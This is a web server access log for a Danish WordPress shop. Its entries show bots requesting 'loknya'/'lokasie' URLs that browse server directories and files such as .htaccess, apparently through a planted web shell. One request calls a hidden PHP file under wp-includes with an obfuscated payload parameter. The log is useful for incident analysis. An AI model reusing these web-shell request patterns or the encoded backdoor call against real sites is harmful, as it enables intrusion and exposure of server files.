74.7.243.235 - - [29/Jul/2026:08:41:24 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lsahe/a/2 HTTP/2" 200 1779 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lsahe/a/2/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:41:24 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/7/d/8 HTTP/2" 200 1984 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/7/d" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:24 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F1%2Fd%2Fe HTTP/2" 200 1999 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:25 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fd%2F1%2Fe HTTP/2" 200 1998 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:25 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/b/8 HTTP/2" 200 1782 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-bors.dk/./lscche/b/8/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:25 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Ff%2F4%2F8 HTTP/2" 200 2134 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:25 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/4/9/b HTTP/2" 200 2048 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/4/9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
57.141.0.17 - - [29/Jul/2026:08:41:25 +0200] "GET /?o=144938402 HTTP/2" 200 4425 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
216.73.216.125 - - [29/Jul/2026:08:41:25 +0200] "GET /privatlivspolitik/?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fd%2Fc HTTP/2" 200 2065 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:25 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/3/b/ HTTP/2" 200 1782 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/3/b/a" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:25 +0200] "GET /privatlivspolitik/?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fb%2F1%2F7 HTTP/2" 200 1982 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:25 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/4/9/f HTTP/2" 200 1978 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/4/9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:26 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F8%2F4%2Ff HTTP/2" 200 2042 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:26 +0200] "GET /privatlivspolitik/?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fb%2F1%2F4 HTTP/2" 200 1984 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:26 +0200] "GET /?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F%2FIMG_2013-150x150.jpg.webp&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F HTTP/2" 200 6399 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:26 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/b/7/f HTTP/2" 200 2036 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/b/7" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:41:26 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/3/3 HTTP/2" 200 1981 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:26 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fc%2Fc%2Fc HTTP/2" 200 1997 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:26 +0200] "GET /index.php?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fb%2F2%2F4%2Fb249b5fe23eccc60&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fb%2F2%2F4 HTTP/2" 200 25796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:27 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/1/b/6 HTTP/2" 200 2079 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/1/b" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:27 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fe%2F2%2Fe HTTP/2" 200 1998 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:27 +0200] "GET /?loknya=/var/www/vhosts/stor-bors.dk/./lscach/5/c/ HTTP/2" 200 1786 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/5/c/e" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:27 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F2%2Fe%2Fe HTTP/2" 200 2103 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:27 +0200] "GET /index.php/%22,t+=%22%3C%22+e.getAttribute(%22src%22?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2F.htaccess&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs HTTP/2" 200 2341 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:27 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/8/d/3 HTTP/2" 200 1985 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/8/d" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:41:27 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/9/c HTTP/2" 200 1779 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-bors.dk/./lscche/9/c/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:27 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F8%2Fe%2Fd HTTP/2" 200 2003 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:28 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Ff%2F7%2Fc HTTP/2" 200 2002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:28 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/b/5/9 HTTP/2" 200 2033 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/b/5" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:41:28 +0200] "GET /?loknya=/var/www/vhosts/store-bors.k/./lscache/6/a/ HTTP/2" 200 1783 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/6/a/d" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:28 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F7%2Ff%2Fc HTTP/2" 200 2053 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:28 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F5%2Fc%2Ff HTTP/2" 200 1978 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:28 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/b/6/1 HTTP/2" 200 1981 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/b/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:41:28 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/7/c/c HTTP/2" 200 2096 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/7/c" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:28 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Ff%2F1%2F7 HTTP/2" 200 1978 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:28 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F6%2F3%2F2 HTTP/2" 200 1991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:29 +0200] "GET /privatlivspolitik/?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fa%2F2 HTTP/2" 200 2180 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:29 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/0/3/d HTTP/2" 200 1992 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/0/3" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:41:29 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/7/b HTTP/2" 200 1780 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-bors.dk/./lscche/7/b/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:29 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F9%2Fc%2F2 HTTP/2" 200 2040 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.0.41 - - [29/Jul/2026:08:41:29 +0200] "GET /?o=286901705 HTTP/2" 200 4425 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
216.73.216.125 - - [29/Jul/2026:08:41:29 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F0%2F4%2F2 HTTP/2" 200 2042 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:29 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/f/4/9 HTTP/2" 200 1969 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/f/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:41:29 +0200] "GET /?loknya=/var/www/vhosts/store-bors.k/./lscache/a/6 HTTP/2" 200 1782 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.k/./lscache/a/6/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:29 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F4%2F8%2F2 HTTP/2" 200 1977 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:30 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F8%2F4%2F2 HTTP/2" 200 2032 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:30 +0200] "GET /?loknya=/vr/www/vhosts/stor-bors.dk/./lscch/8/ HTTP/2" 200 1769 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-bors.dk/./lscche/8/e/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:30 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F0%2Fa%2Fc HTTP/2" 200 2056 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:30 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/lscache/4/9/d HTTP/2" 200 2042 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/4/9" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:30 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F4%2F6%2Fd HTTP/2" 200 2001 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:30 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F9%2Fd%2F7 HTTP/2" 200 1977 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:30 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/8/e HTTP/2" 200 1784 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-bors.dk/./lscche/8/e/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:41:30 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/7/d/8/7d8c666cc2f86b2a&loknya=/var/www/vhosts/store-bors.dk/lscache/7/d/8 HTTP/2" 200 1837 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/7/d/8" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:31 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F8%2Fa%2Fc HTTP/2" 200 2001 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:31 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fa%2F8%2Fc HTTP/2" 200 2002 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:31 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F6%2Fa%2Fa HTTP/2" 200 2000 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:31 +0200] "GET /?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/4/4 HTTP/2" 200 1980 "https://www.store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/./lscache/a/4" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:41:31 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/4/9/b/49be29326df2f4c8&loknya=/var/www/vhosts/store-bors.dk/lscache/4/9/b HTTP/2" 200 1842 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/4/9/b" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
185.21.40.28 - - [29/Jul/2026:08:39:31 +0200] "GET /wp-includes/SimplePie/library/SimplePie/Net/Net/index.php?ARRAY=7o2230223n313738353331303737312p2231223n22687474703n5p2s5p2s7n733936377631332r6p6172676572732r636p69636o5p2s3s6p633q7068705s636s64655s6n6326743q313738353330373137312q3733383632656263343661623566306438383033643734313838373163633938222p2232223n223035353065336239323162373134656535373262646164306539663230643661222p2233223n223739356665343238326538306539353539353835323737623233313331633532222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231342q34382q35392q36342q37342q38362q3131227q HTTP/1.1" 500 567 "-" "-"
216.73.216.125 - - [29/Jul/2026:08:41:31 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2Fd%2F9%2F4 HTTP/2" 200 2038 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:32 +0200] "GET /xmlrpc.php?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fc%2Ff%2F7%2Fcf74acf5262cd019&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2Fc%2Ff%2F7 HTTP/2" 200 1839 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:31 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F9%2Fd%2F4 HTTP/2" 200 1983 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:32 +0200] "GET /?loknya=/vr/www/vhosts/store-ors.dk/./lscche/3/ HTTP/2" 200 1771 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-bors.dk/./lscche/3/b/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:41:32 +0200] "GET /?loknya=/var/www/vhosts/store-ors.dk/lscache/4/9/ HTTP/2" 200 1771 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/4/9/b" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:32 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2F.%2Flscache%2F6 HTTP/2" 200 2213 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.243.235 - - [29/Jul/2026:08:41:32 +0200] "GET /?loknya=/vr/www/vhosts/store-bors.dk/./lscche/3/b HTTP/2" 200 1784 "https://www.store-bors.dk/?loknya=/vr/www/vhosts/store-bors.dk/./lscche/3/b/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.227.174 - - [29/Jul/2026:08:41:32 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/b/7/f/b7f1084d54f690fd&loknya=/var/www/vhosts/store-bors.dk/lscache/b/7/f HTTP/2" 200 1836 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/b/7/f" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:32 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F4%2Fc%2Fa HTTP/2" 200 2051 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:33 +0200] "GET /bep/m/kirlist1?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.k%2Flscache%2F0%2Fe%2F HTTP/2" 200 1779 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.174 - - [29/Jul/2026:08:41:33 +0200] "GET /?lokasie=/var/www/vhosts/store-bors.dk/lscache/1/b/6/1b6b114f504a50ae&loknya=/var/www/vhosts/store-bors.dk/lscache/1/b/6 HTTP/2" 200 19732 "https://store-bors.dk/?loknya=/var/www/vhosts/store-bors.dk/lscache/1/b/6" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
74.7.243.235 - - [29/Jul/2026:08:41:33 +0200] "GET /?loknya=/var/www/vhosts/stor-bors.dk/./lsah/5/ HTTP/2" 200 1771 "https://www.store-bors.dk/?loknya=/var/www/vhosts/stor-bors.dk/./lscach/5/c/" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.125 - - [29/Jul/2026:08:41:32 +0200] "GET /?lokasie=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F%2FBG-1-unsmushed.png&loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Fhttpdocs%2Fwp-content%2Fuploads%2F HTTP/2" 200 837298 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:33 +0200] "GET /%22,t+=%22%3C%22+e.getAttribute(%22src%22?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2F.%2Flscache%2F5%2Fc%2F2 HTTP/2" 200 1987 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.125 - - [29/Jul/2026:08:41:33 +0200] "GET /privatlivspolitik/?loknya=%2Fvar%2Fwww%2Fvhosts%2Fstore-bors.dk%2Flscache%2F2%2Fa HTTP/2" 200 2190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
